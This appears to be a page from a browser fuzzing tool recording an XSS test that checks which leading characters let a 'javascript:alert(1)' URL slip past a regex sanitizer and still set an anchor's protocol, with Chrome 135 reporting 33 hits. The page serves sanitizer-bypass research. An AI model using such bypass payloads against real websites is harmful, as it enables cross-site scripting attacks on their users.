Fuzzing for Max sanitized input (simplified)

Simplified test for Max (https://discord.com/channels/1110206757227216916/1168685918920638614/1358614602153201736)
Created by: vitorfhc
Created on: Monday, April 7, 2025 at 11:26:32 AM
Updated on: Monday, April 7, 2025 at 5:16:20 PM
Vector type: XSS
Vector charset: UTF-8
Code used before fuzz:
<script>
window.onerror=x=>true;
</script>
<base href="https://example.com" />
Template used:
<a id=x></a>
Code used after fuzz:
const mw = /^(?!javascript:)/i;
function nu(e) {
return (e = String(e)).match(mw) ? e : "unsafe:" + e
}
const t = nu(`${String.fromCodePoint($[i])}javascript:alert(1)`);
x.href = t
x.protocol === 'javascript:' && log($[i])
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<a id=x></a>
Fuzz results

Chrome 135.0.0.0 desktop macOS 10.15.7
Updated
Mon Apr 07 2025
Found 33 results
Loading...